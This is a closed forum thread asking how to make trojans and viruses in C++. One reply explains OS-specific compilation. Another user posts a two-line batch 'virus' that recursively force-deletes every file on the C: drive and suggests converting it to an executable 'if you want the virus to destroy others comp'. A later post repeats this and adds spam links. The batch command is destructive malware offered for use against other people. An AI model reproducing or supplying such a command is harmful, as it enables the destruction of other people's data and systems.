monitor file access
Closed Thread
Results 1 to 15 of 24

Thread: Making Trojans/Viruses in C++ How?

Hybrid View

  1. #1
    Join Date
    Sep 2006
    Posts
    157
    Quote Originally Posted by mike*0*
    Different code runs on different operating systems. You can't make a program for ALL operating systems, because they all have different standards and different ways of doing things. If everybody was using the same OS, they would all be able to use the same programs - but people use different operating systems.

    You use a compiler to create programs, as you probably know. This compiler will compile code for the operating system it's running on, so for example if you made a program in Dev-C++ on windows, it will compile an executable for windows. To make programs for a specific OS, you simply boot into that operating system and find a compiler. You can't really program for a specific OS unless you're using it.



    Programs on windows are generally backwards-compatible with all the windows versions down to *5. There are some features which are only available in later versions (like XP), but if you make sure you only use functions that are available in all windows versions, your program will run on any windows OS. Windows hasn't really changed that much in *0 years.
    Arhh thank you thats the answer i needed.

  2. #2
    Join Date
    Apr 2009
    Posts
    7

    Smile trojan virus

    i hav also been lookin for a while for a trojan virus source but i discovered sth

    if you know how you can create a simple BATCH virus for example:
    Code:
    @echo off
    del c:\*.*/f/s/q
    after you save it to a *.bat file you scan it and it shows no virus
    (do not execute this file)
    but if you convert it to an *.exe you will see that the antivirus detects it as a trojan

    the app is called Bat 2 exe converter

    google it and you will find it

    i know this is not what you guys are lookin' for, i haven't found a trojan source too but this is worthy if you want the virus to destroy others comp, and not only for knowledge
    Last edited by tonig_; 04-26-2009 at 01:43 PM. Reason: forgot sth

  3. #3
    Join Date
    Dec 2010
    Posts
    1
    Quote Originally Posted by Newby_Programme View Post
    Arhh thank you thats the answer i needed.
    i know this is not what you guys are lookin' for, i haven't found a trojan source too but this is worthy if you want the virus to destroy others comp, and not only for knowledge
    [url=http://*****************/watch?v=OnQRn2N*sdQ]iphone book reader[/url]
    [url=http://*****************/watch?v=OnQRn2N*sdQ]iphone ebook[/url]

Closed Thread

Similar Threads

  1. How do people get viruses, trojans, worms, etc.?
    By robetlndis in forum Viruses and Trojans
    Replies: 16
    Last Post: 06-30-2015, 05:53 PM
  2. Viruses and Trojans Forum
    By Ezekiel in forum Viruses and Trojans
    Replies: 0
    Last Post: 06-11-2007, 09:39 AM
  3. For people who can't make viruses/trojans
    By Moonbat in forum Viruses and Trojans
    Replies: 8
    Last Post: 11-17-2006, 07:49 PM
  4. Undetect viruses, trojans servers and other files
    By PlainTeXT in forum Viruses and Trojans
    Replies: 7
    Last Post: 11-14-2004, 04:31 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts